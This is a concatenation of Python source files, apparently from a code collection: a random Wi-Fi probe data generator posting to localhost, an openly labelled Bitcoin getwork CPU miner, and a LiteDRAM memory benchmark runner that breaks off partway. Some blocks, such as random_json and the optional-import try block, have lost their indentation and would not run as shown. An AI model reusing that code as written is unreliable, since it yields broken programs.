    """Random RSSI reading in [-100, -1] dBm, returned as a string."""
    return "%d" % random.randrange(-100, 0)
def random_range():
    """Random distance in [0, 100], rounded to one decimal, as a string."""
    distance = random.uniform(0, 100)
    return str(round(distance, 1))
def random_id():
    """Random probe id in [1, 999], returned as a string."""
    return "%d" % random.randrange(1, 1000)
# Module-level leftover: unused here, __main__ shadows it with its own list.
probeList = []

# Commented-out draft of a batch probe generator (never finished -- note the
# dangling "time": value); kept for reference.
# def randomProbe(times):
#
#     for i in range(1000):
#         probe = {"id": random_id(), "mmac": random_mac(), "rate": 3, "wssid": "test", "wmac": random_mac(), "time": }
#         probes = json.dumps(probe)
#         probeList.append(probes)
def random_json():
headers = {'Content-Type': 'application/json'}
probe = {"id": ''+random_id(), "mmac": random_mac(), "rate": "3", "wssid": "test", "wmac": random_mac(), "time": time.strftime('%a %b %e %H:%M:%S %Y', time.localtime(time.time()))}
mac_data ={"mac": random_mac(), "rssi": random_rssi(), "range": random_range()}
mac_DataMul = []
#data_json = json.dumps(mac_data)
for i in range(random.randrange(1, 5)):
mac_DataMul.append({"mac": random_mac(), "rssi": random_rssi(), "range": random_range()})
probe['data'] = mac_DataMul
probe = json.dumps(probe)
print probe
request = urllib2.Request(url='http://localhost:8080/upload.action', headers=headers, data=probe)
response = urllib2.urlopen(request)
print "response:" + response
# Entry point: send 1000 random probe reports, one per second.
if __name__ == '__main__':
    threads = []
    probeList = []
    index=0
    # Earlier multi-threaded experiment, kept for reference:
    # for i in range(10):
    #     probe = {"id": i, "mmac": random_mac(), "rate": 3, "wssid": "test", "wmac": random_mac()}
    #     probes = json.dumps(probe)
    #     probeList.append(probes)
    # for i in range(10):
    #     t = threading.Thread(target=random_json)
    #     threads.append(t)
    # for i in range(10):
    #     threads[i].setDaemon(True)
    #     threads[i].start()
    for i in range(1000):
        random_json()
        sleep(1)
    print "all over %s" %ctime()
# print random_mac()
# print random_rssi()
# print random_range()
# print random_json() |
pyminer.py | #!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15        # seconds to back off after a failed/invalid RPC response
MAX_NONCE = 1000000L  # initial nonce scan range; later adapted from 'scantime'
settings = {}         # populated from the key=value config file in __main__
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
    """Minimal JSON-RPC 1.1 client for talking to a bitcoind node (Python 2)."""

    # NOTE(review): OBJID is a class attribute, but "self.OBJID += 1" below
    # creates a per-instance copy on first use, so request ids are only
    # unique per connection, not globally -- confirm whether that matters.
    OBJID = 1

    def __init__(self, host, port, username, password):
        # HTTP Basic auth header derived from the RPC credentials.
        authpair = "%s:%s" % (username, password)
        self.authhdr = "Basic %s" % (base64.b64encode(authpair))
        # strict=False, 30 second timeout.
        self.conn = httplib.HTTPConnection(host, port, False, 30)

    def rpc(self, method, params=None):
        """Issue one JSON-RPC call.

        Returns the 'result' field on success, the 'error' object if the
        server reported one, or None on transport/decoding problems.
        """
        self.OBJID += 1
        obj = { 'version' : '1.1',
            'method' : method,
            'id' : self.OBJID }
        if params is None:
            obj['params'] = []
        else:
            obj['params'] = params
        self.conn.request('POST', '/', json.dumps(obj),
            { 'Authorization' : self.authhdr,
              'Content-type' : 'application/json' })

        resp = self.conn.getresponse()
        if resp is None:
            print "JSON-RPC: no response"
            return None

        body = resp.read()
        resp_obj = json.loads(body)
        if resp_obj is None:
            print "JSON-RPC: cannot JSON-decode body"
            return None
        if 'error' in resp_obj and resp_obj['error'] != None:
            return resp_obj['error']
        if 'result' not in resp_obj:
            print "JSON-RPC: no result in object"
            return None

        return resp_obj['result']

    def getblockcount(self):
        """RPC: current block height."""
        return self.rpc('getblockcount')

    def getwork(self, data=None):
        """RPC: fetch new work (data=None) or submit a solved block (data given)."""
        return self.rpc('getwork', data)
def uint32(x):
    """Truncate *x* to an unsigned 32-bit value."""
    # 0xffffffff without the "L" suffix behaves identically in Python 2
    # (ints auto-promote to long) and also parses under Python 3, where the
    # "L" suffix is a syntax error.
    return x & 0xffffffff
def bytereverse(x):
    """Swap the byte order of a 32-bit word, e.g. 0x11223344 -> 0x44332211."""
    swapped = ((x << 24) | ((x << 8) & 0x00ff0000) |
               ((x >> 8) & 0x0000ff00) | (x >> 24))
    # Keep only the low 32 bits (same as the uint32() helper).
    return swapped & 0xffffffff
def bufreverse(in_buf):
    """Return *in_buf* with each 32-bit word byte-swapped (Python 2 str buffer)."""
    out_words = []
    for offset in range(0, len(in_buf), 4):
        (word,) = struct.unpack('@I', in_buf[offset:offset + 4])
        out_words.append(struct.pack('@I', bytereverse(word)))
    return ''.join(out_words)
def wordreverse(in_buf):
    """Reverse the order of the 32-bit words in *in_buf*; bytes within each
    word keep their order."""
    words = [in_buf[i:i + 4] for i in range(0, len(in_buf), 4)]
    return ''.join(reversed(words))
class Miner:
    """Single getwork miner: scans nonces over double-SHA256 (Python 2)."""

    def __init__(self, id):
        self.id = id
        # Nonces scanned per getwork round; adapted in iterate() to match
        # settings['scantime'] seconds of work.
        self.max_nonce = MAX_NONCE

    def work(self, datastr, targetstr):
        """Scan nonces for one unit of work.

        Returns (hashes_done, nonce_bin) where nonce_bin is the packed
        winning nonce, or None if no solution was found in this scan.
        """
        # decode work data hex string to binary
        static_data = datastr.decode('hex')
        static_data = bufreverse(static_data)

        # the first 76b of 80b do not change
        blk_hdr = static_data[:76]

        # decode 256-bit target value
        targetbin = targetstr.decode('hex')
        targetbin = targetbin[::-1]  # byte-swap and dword-swap
        targetbin_str = targetbin.encode('hex')
        target = long(targetbin_str, 16)

        # pre-hash first 76b of block header
        static_hash = hashlib.sha256()
        static_hash.update(blk_hdr)

        for nonce in xrange(self.max_nonce):
            # encode 32-bit nonce value
            nonce_bin = struct.pack("<I", nonce)

            # hash final 4b, the nonce value
            hash1_o = static_hash.copy()
            hash1_o.update(nonce_bin)
            hash1 = hash1_o.digest()

            # sha256 hash of sha256 hash
            hash_o = hashlib.sha256()
            hash_o.update(hash1)
            hash = hash_o.digest()

            # quick test for winning solution: high 32 bits zero?
            if hash[-4:] != '\0\0\0\0':
                continue

            # convert binary hash to 256-bit Python long
            hash = bufreverse(hash)
            hash = wordreverse(hash)
            hash_str = hash.encode('hex')
            l = long(hash_str, 16)

            # proof-of-work test: hash < target
            if l < target:
                print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
                return (nonce + 1, nonce_bin)
            else:
                print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
                # return (nonce + 1, nonce_bin)

        return (nonce + 1, None)

    def submit_work(self, rpc, original_data, nonce_bin):
        """Splice the winning nonce into the original work hex and submit it."""
        nonce_bin = bufreverse(nonce_bin)
        nonce = nonce_bin.encode('hex')
        # The nonce lives at hex offset 152..160 of the 256-char data field.
        solution = original_data[:152] + nonce + original_data[160:256]
        param_arr = [ solution ]
        result = rpc.getwork(param_arr)
        print time.asctime(), "--> Upstream RPC result:", result

    def iterate(self, rpc):
        """One mining round: fetch work, scan, adapt scan size, submit if solved."""
        work = rpc.getwork()
        if work is None:
            time.sleep(ERR_SLEEP)
            return
        if 'data' not in work or 'target' not in work:
            time.sleep(ERR_SLEEP)
            return

        time_start = time.time()

        (hashes_done, nonce_bin) = self.work(work['data'],
                             work['target'])

        time_end = time.time()
        time_diff = time_end - time_start

        # Resize max_nonce so one scan takes about settings['scantime'] seconds,
        # capped just below the 32-bit nonce limit.
        self.max_nonce = long(
            (hashes_done * settings['scantime']) / time_diff)
        if self.max_nonce > 0xfffffffaL:
            self.max_nonce = 0xfffffffaL

        if settings['hashmeter']:
            print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
                  self.id, hashes_done,
                  (hashes_done / 1000.0) / time_diff)

        if nonce_bin is not None:
            self.submit_work(rpc, work['data'], nonce_bin)

    def loop(self):
        """Connect to the RPC server and mine forever."""
        rpc = BitcoinRPC(settings['host'], settings['port'],
                 settings['rpcuser'], settings['rpcpass'])
        if rpc is None:
            return

        while True:
            self.iterate(rpc)
def miner_thread(id):
    """Process entry point: run one Miner instance forever."""
    Miner(id).loop()
if __name__ == '__main__':
    if len(sys.argv) != 2:
        print "Usage: pyminer.py CONFIG-FILE"
        sys.exit(1)

    # Parse simple "key = value" config file; lines starting with '#' are comments.
    f = open(sys.argv[1])
    for line in f:
        # skip comment lines
        m = re.search('^\s*#', line)
        if m:
            continue

        # parse key=value lines
        m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
        if m is None:
            continue
        settings[m.group(1)] = m.group(2)
    f.close()

    # Defaults for optional settings.
    if 'host' not in settings:
        settings['host'] = '127.0.0.1'
    if 'port' not in settings:
        settings['port'] = 10320
    if 'threads' not in settings:
        settings['threads'] = 1
    if 'hashmeter' not in settings:
        settings['hashmeter'] = 0
    if 'scantime' not in settings:
        settings['scantime'] = 30L
    if 'rpcuser' not in settings or 'rpcpass' not in settings:
        print "Missing username and/or password in cfg file"
        sys.exit(1)

    # Normalize numeric settings (values parsed from the file are strings).
    settings['port'] = int(settings['port'])
    settings['threads'] = int(settings['threads'])
    settings['hashmeter'] = int(settings['hashmeter'])
    settings['scantime'] = long(settings['scantime'])

    # One miner *process* per configured "thread".
    thr_list = []
    for thr_id in range(settings['threads']):
        p = Process(target=miner_thread, args=(thr_id,))
        p.start()
        thr_list.append(p)
        time.sleep(1)  # stagger threads

    print settings['threads'], "mining threads started"

    print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
    try:
        for thr_proc in thr_list:
            thr_proc.join()
    except KeyboardInterrupt:
        pass
    print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
run_benchmarks.py | #!/usr/bin/env python3
# This file is Copyright (c) 2020 Antmicro <www.antmicro.com>
# License: BSD
# Limitations/TODO
# - add configurable sdram_clk_freq - using hardcoded value now
# - sdram_controller_data_width - try to expose the value from litex_sim to avoid duplicated code
import os
import re
import sys
import json
import argparse
import datetime
import subprocess
from collections import defaultdict, namedtuple
import yaml
try:
import numpy as np
import pandas as pd
import matplotlib
from matplotlib.ticker import FuncFormatter, PercentFormatter, ScalarFormatter
_summary = True
except ImportError as e:
_summary = False
print("[WARNING] Results summary not available:", e, file=sys.stderr)
from litex.tools.litex_sim import get_sdram_phy_settings, sdram_module_nphases
from litedram import modules as litedram_modules
from litedram.common import Settings as _Settings
from test import benchmark
# Benchmark configuration --------------------------------------------------------------------------
class Settings(_Settings):
    """Settings base class that can recursively serialize itself to a dict."""

    def as_dict(self):
        """Return public attributes as a plain dict; nested Settings recurse."""
        result = dict()
        for name, value in vars(self).items():
            # Skip the "self" entry stored by set_attributes() and privates.
            if name == "self" or name.startswith("_"):
                continue
            result[name] = value.as_dict() if isinstance(value, Settings) else value
        return result
class GeneratedAccess(Settings):
    """BIST-generated access pattern (sequential or random) of a given length."""

    def __init__(self, bist_length, bist_random):
        self.set_attributes(locals())

    @property
    def length(self):
        """Number of accesses in the generated pattern."""
        return self.bist_length

    def as_args(self):
        """Translate these settings into benchmark command-line arguments."""
        cli = ["--bist-length=%d" % self.bist_length]
        if self.bist_random:
            cli.append("--bist-random")
        return cli
class CustomAccess(Settings):
    """Access pattern loaded from a user-provided pattern file."""

    def __init__(self, pattern_file):
        self.set_attributes(locals())

    @property
    def pattern(self):
        # We have to load the file to know pattern length, cache it when requested
        if not hasattr(self, "_pattern"):
            path = self.pattern_file
            if not os.path.isabs(path):
                # Relative paths resolve against the benchmark module directory.
                path = os.path.join(os.path.dirname(benchmark.__file__), path)
            self._pattern = benchmark.load_access_pattern(path)
        return self._pattern

    @property
    def length(self):
        """Number of accesses in the loaded pattern."""
        return len(self.pattern)

    def as_args(self):
        """Translate these settings into benchmark command-line arguments."""
        return ["--access-pattern=%s" % self.pattern_file]
class BenchmarkConfiguration(Settings):
    """Complete description of one benchmark run: SDRAM module, widths,
    generator/checker counts and the access pattern to replay."""

    def __init__(self, name, sdram_module, sdram_data_width, bist_alternating,
                 num_generators, num_checkers, access_pattern):
        self.set_attributes(locals())

    def as_args(self):
        """Benchmark script command-line arguments equivalent to this config."""
        args = [
            "--sdram-module=%s" % self.sdram_module,
            "--sdram-data-width=%d" % self.sdram_data_width,
            "--num-generators=%d" % self.num_generators,
            "--num-checkers=%d" % self.num_checkers,
        ]
        if self.bist_alternating:
            args.append("--bist-alternating")
        args += self.access_pattern.as_args()
        return args

    def __eq__(self, other):
        if not isinstance(other, BenchmarkConfiguration):
            return NotImplemented
        return self.as_dict() == other.as_dict()

    @property
    def length(self):
        # Delegate to the access pattern (generated length or pattern-file size).
        return self.access_pattern.length

    @classmethod
    def from_dict(cls, d):
        """Build a configuration from a dict (e.g. parsed YAML/JSON)."""
        # Pick the access-pattern class based on the serialized keys.
        access_cls = CustomAccess if "pattern_file" in d["access_pattern"] else GeneratedAccess
        d["access_pattern"] = access_cls(**d["access_pattern"])
        return cls(**d)

    @classmethod
    def load_yaml(cls, yaml_file):
        """Load a list of configurations from a YAML file (one entry per name)."""
        with open(yaml_file) as f:
            description = yaml.safe_load(f)
        configs = []
        for name, desc in description.items():
            desc["name"] = name
            configs.append(cls.from_dict(desc))
        return configs

    def __repr__(self):
        return "BenchmarkConfiguration(%s)" % self.as_dict()

    @property
    def sdram_clk_freq(self):
        return 100e6  # FIXME: Value of 100MHz is hardcoded in litex_sim

    @property
    def sdram_memtype(self):
        # Use values from module class (no need to instantiate it)
        sdram_module_cls = getattr(litedram_modules, self.sdram_module)
        return sdram_module_cls.memtype

    @property
    def sdram_controller_data_width(self):
        # DFI data width = PHY data width per phase times the number of phases.
        nphases = sdram_module_nphases[self.sdram_memtype]
        dfi_databits = self.sdram_data_width * (1 if self.sdram_memtype == "SDR" else 2)
        return dfi_databits * nphases
# Benchmark results --------------------------------------------------------------------------------
# Constructs python regex named group
def ng(name, regex):
    """Wrap *regex* in a python named capture group called *name*."""
    return "(?P<" + name + ">" + regex + ")"
def _compiled_pattern(stage, var):
    """Compile a regex matching benchmark output lines of the form
    "<stage>  <var>: <integer>", capturing the integer in group "value"."""
    pattern_fmt = r"{stage}\s+{var}:\s+{value}"
    pattern = pattern_fmt.format(
        stage = stage,
        var = var,
        value = ng("value", "[0-9]+"),
    )
    # Fix: removed a stray, unreachable statement that used to follow this
    # return (`result = re.search(pattern, benchmark_output)`) -- it was dead
    # code referencing an undefined name.
    return re.compile(pattern)
class BenchmarkResult:
    """Parses the benchmark metrics out of captured benchmark output."""

    # Pre-compiled patterns for all benchmarks
    patterns = {
        "generator_ticks": _compiled_pattern("BIST-GENERATOR", "ticks"),
        "checker_errors": _compiled_pattern("BIST-CHECKER", "errors"),
        "checker_ticks": _compiled_pattern("BIST-CHECKER", "ticks"),
    }

    @staticmethod
    def find(pattern, output):
        """Return the integer captured by *pattern* in *output* (assert on miss)."""
        match = pattern.search(output)
        assert match is not None, \
            "Could not find pattern {} in output".format(pattern)
        return int(match.group("value"))

    def __init__(self, output):
        # Raw output is kept so RunCache can re-serialize it later.
        self._output = output
        for name in self.patterns:
            setattr(self, name, self.find(self.patterns[name], output))

    def __repr__(self):
        values = {name: getattr(self, name) for name in self.patterns.keys()}
        return "BenchmarkResult(%s)" % values
# Results summary ----------------------------------------------------------------------------------
def human_readable(value):
    """Choose a binary prefix for *value*.

    Returns (mult, prefix) such that value * mult falls below 1024 where
    possible; prefix is one of "", "k", "M", "G", "T".
    """
    prefixes = ["", "k", "M", "G", "T"]
    mult = 1.0
    chosen = prefixes[-1]
    for candidate in prefixes:
        if value * mult < 1024:
            chosen = candidate
            break
        mult /= 1024
    return mult, chosen
def clocks_fmt(clocks):
    """Format a clock count for display, e.g. 45.9 -> "45 clk"."""
    return "%d clk" % int(clocks)
def bandwidth_fmt(bw):
    """Format a bandwidth in bits/s with a binary prefix, e.g. "1.5 Mbps"."""
    scale, prefix = human_readable(bw)
    return "%.1f %sbps" % (bw * scale, prefix)
def efficiency_fmt(eff):
    """Format an efficiency ratio as a percentage, e.g. 0.5 -> "50.0 %"."""
    return "%.1f %%" % (eff * 100)
def get_git_file_path(filename):
    """Return *filename*'s path relative to the git repo root, or "" on failure."""
    cmd = ["git", "ls-files", "--full-name", filename]
    proc = subprocess.run(cmd, stdout=subprocess.PIPE, cwd=os.path.dirname(__file__))
    if proc.returncode != 0:
        return ""
    return proc.stdout.decode().strip()
def get_git_revision_hash(short=False):
    """Return the git HEAD commit hash ("" on failure); abbreviated if *short*."""
    cmd = ["git", "rev-parse"] + (["--short"] if short else []) + ["HEAD"]
    proc = subprocess.run(cmd, stdout=subprocess.PIPE, cwd=os.path.dirname(__file__))
    if proc.returncode != 0:
        return ""
    return proc.stdout.decode().strip()
class ResultsSummary:
    """Aggregates benchmark run data into a pandas DataFrame and renders
    text, HTML and plot summaries of the results."""

    def __init__(self, run_data, plots_dir="plots"):
        self.plots_dir = plots_dir

        # Because .sdram_controller_data_width may fail for unimplemented modules
        def except_none(func):
            try:
                return func()
            except:  # deliberately broad: any failure maps to None/NaN
                return None

        # Gather results into tabular data
        column_mappings = {
            "name": lambda d: d.config.name,
            "sdram_module": lambda d: d.config.sdram_module,
            "sdram_data_width": lambda d: d.config.sdram_data_width,
            "bist_alternating": lambda d: d.config.bist_alternating,
            "num_generators": lambda d: d.config.num_generators,
            "num_checkers": lambda d: d.config.num_checkers,
            "bist_length": lambda d: getattr(d.config.access_pattern, "bist_length", None),
            "bist_random": lambda d: getattr(d.config.access_pattern, "bist_random", None),
            "pattern_file": lambda d: getattr(d.config.access_pattern, "pattern_file", None),
            "length": lambda d: d.config.length,
            "generator_ticks": lambda d: getattr(d.result, "generator_ticks", None),  # None means benchmark failure
            "checker_errors": lambda d: getattr(d.result, "checker_errors", None),
            "checker_ticks": lambda d: getattr(d.result, "checker_ticks", None),
            "ctrl_data_width": lambda d: except_none(lambda: d.config.sdram_controller_data_width),
            "sdram_memtype": lambda d: except_none(lambda: d.config.sdram_memtype),
            "clk_freq": lambda d: d.config.sdram_clk_freq,
        }
        columns = {name: [mapping(data) for data in run_data] for name, mapping, in column_mappings.items()}
        self._df = df = pd.DataFrame(columns)

        # Replace None with NaN
        df.fillna(value=np.nan, inplace=True)

        # Compute other metrics based on ticks and configuration parameters
        df["clk_period"] = 1 / df["clk_freq"]
        # Bandwidth is the number of bits per time
        # in case with N generators/checkers we actually process N times more data
        df["write_bandwidth"] = (8 * df["length"] * df["num_generators"]) / (df["generator_ticks"] * df["clk_period"])
        df["read_bandwidth"] = (8 * df["length"] * df["num_checkers"]) / (df["checker_ticks"] * df["clk_period"])
        # Efficiency calculated as number of write/read commands to number of cycles spent on writing/reading (ticks)
        # for multiple generators/checkers multiply by their number
        df["cmd_count"] = df["length"] / (df["ctrl_data_width"] / 8)
        df["write_efficiency"] = df["cmd_count"] * df["num_generators"] / df["generator_ticks"]
        df["read_efficiency"] = df["cmd_count"] * df["num_checkers"] / df["checker_ticks"]
        # Latency rows are the runs with a single access (bist_length == 1).
        df["write_latency"] = df[df["bist_length"] == 1]["generator_ticks"]
        df["read_latency"] = df[df["bist_length"] == 1]["checker_ticks"]

        # Boolean distinction between latency benchmarks and sequence benchmarks,
        # as their results differ significantly
        df["is_latency"] = ~pd.isna(df["write_latency"])
        assert (df["is_latency"] == ~pd.isna(df["read_latency"])).all(), \
            "write_latency and read_latency should both have a value or both be NaN"

        # Data formatting for text summary
        self.text_formatters = {
            "write_bandwidth": bandwidth_fmt,
            "read_bandwidth": bandwidth_fmt,
            "write_efficiency": efficiency_fmt,
            "read_efficiency": efficiency_fmt,
            "write_latency": clocks_fmt,
            "read_latency": clocks_fmt,
        }

        # Data formatting for plot summary
        self.plot_xticks_formatters = {
            "write_bandwidth": FuncFormatter(lambda value, pos: bandwidth_fmt(value)),
            "read_bandwidth": FuncFormatter(lambda value, pos: bandwidth_fmt(value)),
            "write_efficiency": PercentFormatter(1.0),
            "read_efficiency": PercentFormatter(1.0),
            "write_latency": ScalarFormatter(),
            "read_latency": ScalarFormatter(),
        }

    def df(self, ok=True, failures=False):
        """Return the results DataFrame, optionally keeping only ok rows or failures."""
        is_failure = lambda df: pd.isna(df["generator_ticks"]) | pd.isna(df["checker_ticks"]) | pd.isna(df["checker_errors"])
        df = self._df
        if not ok:  # remove ok
            is_ok = ~is_failure(df)
            df = df[~is_ok]
        if not failures:  # remove failures
            df = df[~is_failure(df)]
        return df

    def header(self, text):
        """Render a section header line for the text summary."""
        return "===> {}".format(text)

    def print_df(self, title, df):
        """Print a titled DataFrame with all rows/columns visible."""
        # Make sure all data will be shown
        with pd.option_context("display.max_rows", None, "display.max_columns", None, "display.width", None):
            print(self.header(title + ":"))
            print(df)

    def get_summary(self, df, mask=None, columns=None, column_formatting=None, sort_kwargs=None):
        """Return a sorted/formatted/filtered copy of *df* for presentation."""
        # Work on a copy
        df = df.copy()
        if sort_kwargs is not None:
            df = df.sort_values(**sort_kwargs)
        if column_formatting is not None:
            for column, mapping in column_formatting.items():
                # Keep the raw values under a "_"-prefixed column name.
                old = "_{}".format(column)
                df[old] = df[column].copy()
                df[column] = df[column].map(lambda value: mapping(value) if not pd.isna(value) else value)
        df = df[mask] if mask is not None else df
        df = df[columns] if columns is not None else df
        return df

    def text_summary(self):
        """Print every grouped results table to stdout."""
        for title, df in self.groupped_results():
            self.print_df(title, df)
            print()

    def html_summary(self, output_dir):
        """Render all grouped results tables into output_dir/summary.html."""
        import jinja2

        tables = {}
        names = {}
        for title, df in self.groupped_results():
            table_id = title.lower().replace(" ", "_")
            tables[table_id] = df.to_html(table_id=table_id, border=0)
            names[table_id] = title

        template_dir = os.path.join(os.path.dirname(__file__), "summary")
        env = jinja2.Environment(loader=jinja2.FileSystemLoader(template_dir))
        template = env.get_template("summary.html.jinja2")

        os.makedirs(output_dir, exist_ok=True)
        with open(os.path.join(output_dir, "summary.html"), "w") as f:
            f.write(template.render(
                title = "LiteDRAM benchmarks summary",
                tables = tables,
                names = names,
                script_path = get_git_file_path(__file__),
                revision = get_git_revision_hash(),
                revision_short = get_git_revision_hash(short=True),
                generation_date = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
            ))

    def groupped_results(self, formatters=None):
        """Yield (title, DataFrame) pairs for each benchmark category.

        NOTE(review): the trailing commas after the later yields are harmless
        (each still yields a 2-tuple).
        """
        df = self.df()

        if formatters is None:
            formatters = self.text_formatters

        common_columns = [
            "name", "sdram_module", "sdram_memtype", "sdram_data_width",
            "bist_alternating", "num_generators", "num_checkers"
        ]
        latency_columns = ["write_latency", "read_latency"]
        performance_columns = [
            "write_bandwidth", "read_bandwidth", "write_efficiency", "read_efficiency"
        ]
        failure_columns = [
            "bist_length", "bist_random", "pattern_file", "length",
            "generator_ticks", "checker_errors", "checker_ticks"
        ]

        yield "Latency", self.get_summary(df,
            mask = df["is_latency"] == True,
            columns = common_columns + latency_columns,
            column_formatting = formatters,
        )
        yield "Custom access pattern", self.get_summary(df,
            mask = (df["is_latency"] == False) & (~pd.isna(df["pattern_file"])),
            columns = common_columns + ["length", "pattern_file"] + performance_columns,
            column_formatting = formatters,
        ),
        yield "Sequential access pattern", self.get_summary(df,
            mask = (df["is_latency"] == False) & (pd.isna(df["pattern_file"])) & (df["bist_random"] == False),
            columns = common_columns + ["bist_length"] + performance_columns,  # could be length
            column_formatting = formatters,
        ),
        yield "Random access pattern", self.get_summary(df,
            mask = (df["is_latency"] == False) & (pd.isna(df["pattern_file"])) & (df["bist_random"] == True),
            columns = common_columns + ["bist_length"] + performance_columns,
            column_formatting = formatters,
        ),
        yield "Failures", self.get_summary(self.df(ok=False, failures=True),
            columns = common_columns + failure_columns,
            column_formatting = None,
        ),

    def plot_summary(self, plots_dir="plots", backend="Agg", theme="default", save_format="png", **savefig_kw):
        """Save a bar plot of each metric for each benchmark group.

        With a non-Agg backend the figures are also shown interactively.
        """
        matplotlib.use(backend)
        import matplotlib.pyplot as plt
        plt.style.use(theme)

        for title, df in self.groupped_results(formatters={}):
            for column in self.plot_xticks_formatters.keys():
                if column not in df.columns or df[column].empty:
                    continue
                axis = self.plot_df(title, df, column)

                # construct path
                def path_name(name):
                    return name.lower().replace(" ", "_")

                filename = "{}.{}".format(path_name(column), save_format)
                path = os.path.join(plots_dir, path_name(title), filename)
                os.makedirs(os.path.dirname(path), exist_ok=True)

                # save figure
                axis.get_figure().savefig(path, **savefig_kw)

        if backend != "Agg":
            plt.show()

    def plot_df(self, title, df, column, fig_width=6.4, fig_min_height=2.2, save_format="png", save_filename=None):
        """Plot one metric column as a horizontal bar chart; return the axis."""
        if save_filename is None:
            save_filename = os.path.join(self.plots_dir, title.lower().replace(" ", "_"))

        axis = df.plot(kind="barh", x="name", y=column, title=title, grid=True, legend=False)
        fig = axis.get_figure()

        if column in self.plot_xticks_formatters:
            axis.xaxis.set_major_formatter(self.plot_xticks_formatters[column])
            axis.xaxis.set_tick_params(rotation=15)
        axis.spines["top"].set_visible(False)
        axis.spines["right"].set_visible(False)
        axis.set_axisbelow(True)
        axis.set_ylabel("")  # No need for label as we have only one series

        # For large number of rows, the bar labels start overlapping
        # use fixed ratio between number of rows and height of figure
        n_ok = 16
        new_height = (fig_width / n_ok) * len(df)
        fig.set_size_inches(fig_width, max(fig_min_height, new_height))

        # Remove empty spaces
        fig.tight_layout()

        return axis
# Run ----------------------------------------------------------------------------------------------
class RunCache(list):
    """A list of benchmark runs that can be serialized to and from JSON."""

    RunData = namedtuple("RunData", ["config", "result"])

    def dump_json(self, filename):
        """Write config dicts plus raw benchmark output for every run."""
        entries = []
        for data in self:
            entries.append({
                "config": data.config.as_dict(),
                "output": getattr(data.result, "_output", None),
            })
        with open(filename, "w") as f:
            json.dump(entries, f)

    @classmethod
    def load_json(cls, filename):
        """Rebuild run data from a file produced by dump_json()."""
        with open(filename, "r") as f:
            json_data = json.load(f)
        loaded = []
        for entry in json_data:
            config = BenchmarkConfiguration.from_dict(entry["config"])
            output = entry["output"]
            result = BenchmarkResult(output) if output is not None else None
            loaded.append(cls.RunData(config=config, result=result))
        return loaded
def run_python(script, args, **kwargs):
    """Run *script* with python3 from its own directory; return captured stdout.

    NOTE(review): str() on proc.stdout yields the repr of a bytes object
    ("b'...'"); the BenchmarkResult regexes appear to tolerate this -- confirm
    before changing it to .decode().
    """
    proc = subprocess.run(
        ["python3", script, *args],
        stdout=subprocess.PIPE,
        cwd=os.path.dirname(script),
        **kwargs,
    )
    return str(proc.stdout)
# Bundle of everything one benchmark invocation needs.
BenchmarkArgs = namedtuple("BenchmarkArgs", ["config", "output_dir", "ignore_failures", "timeout"])


def run_single_benchmark(fargs):
    """Run one benchmark in a subprocess and parse its output.

    Returns a BenchmarkResult, or None when the run failed and
    fargs.ignore_failures is set; otherwise failures re-raise.
    """
    # Run as separate process, because else we cannot capture all output from verilator
    print(" {}: {}".format(fargs.config.name, " ".join(fargs.config.as_args())))
    try:
        args = fargs.config.as_args() + ["--output-dir", fargs.output_dir, "--log-level", "warning"]
        output = run_python(benchmark.__file__, args, timeout=fargs.timeout)
        result = BenchmarkResult(output)
        # Exit if checker had any read error
        if result.checker_errors != 0:
            raise RuntimeError("Error during benchmark: checker_errors = {}, args = {}".format(
                result.checker_errors, fargs.config.as_args()
            ))
    except Exception as e:
        if fargs.ignore_failures:
            print(" {}: ERROR: {}".format(fargs.config.name, e))
            return None
        else:
            raise
    print(" {}: ok".format(fargs.config.name))
    return result
# Work items carry an index so results can be re-ordered after parallel runs.
InQueueItem = namedtuple("InQueueItem", ["index", "config"])
OutQueueItem = namedtuple("OutQueueItem", ["index", "result"])


def run_parallel(configurations, output_base_dir, njobs, ignore_failures, timeout):
    """Run the benchmarks on *njobs* worker processes.

    Results are returned in the same order as *configurations*.
    njobs == 0 means "use os.cpu_count() workers".
    """
    from multiprocessing import Process, Queue
    import queue

    def worker(in_queue, out_queue, out_dir):
        # Consume configurations until the None sentinel arrives.
        while True:
            in_item = in_queue.get()
            if in_item is None:
                return
            fargs = BenchmarkArgs(in_item.config, out_dir, ignore_failures, timeout)
            result = run_single_benchmark(fargs)
            out_queue.put(OutQueueItem(in_item.index, result))

    if njobs == 0:
        njobs = os.cpu_count()
    print("Using {:d} parallel jobs".format(njobs))

    # Use one directory per worker, as running each benchmark in separate directory
    # takes too much disk space (~2GB per 100 benchmarks)
    dir_pool = [os.path.join(output_base_dir, "worker_%02d" % i) for i in range(njobs)]

    in_queue, out_queue = Queue(), Queue()
    workers = [Process(target=worker, args=(in_queue, out_queue, dir)) for dir in dir_pool]
    for w in workers:
        w.start()

    # Put all benchmark configurations with index to retrieve them in order
    for i, config in enumerate(configurations):
        in_queue.put(InQueueItem(i, config))

    # Send "finish signal" for each worker
    for _ in workers:
        in_queue.put(None)

    # Retrieve results in proper order
    out_items = [out_queue.get() for _ in configurations]
    results = [out.result for out in sorted(out_items, key=lambda o: o.index)]

    for p in workers:
        p.join()

    return results
def run_benchmarks(configurations, output_base_dir, njobs, ignore_failures, timeout):
    """Run all benchmarks (serially or in parallel) and pair each config with its result."""
    print("Running {:d} benchmarks ...".format(len(configurations)))
    if njobs == 1:
        # Serial path: run each benchmark directly in this process.
        results = []
        for config in configurations:
            fargs = BenchmarkArgs(config, output_base_dir, ignore_failures, timeout)
            results.append(run_single_benchmark(fargs))
    else:
        results = run_parallel(configurations, output_base_dir, njobs, ignore_failures, timeout)
    return [RunCache.RunData(config, result) for config, result in zip(configurations, results)]
def main(argv=None):
    """CLI entry point: run (or load cached) benchmarks, then emit text/HTML/plot summaries."""
    parser = argparse.ArgumentParser(description="Run LiteDRAM benchmarks and collect the results.")
    parser.add_argument("config", help="YAML config file")
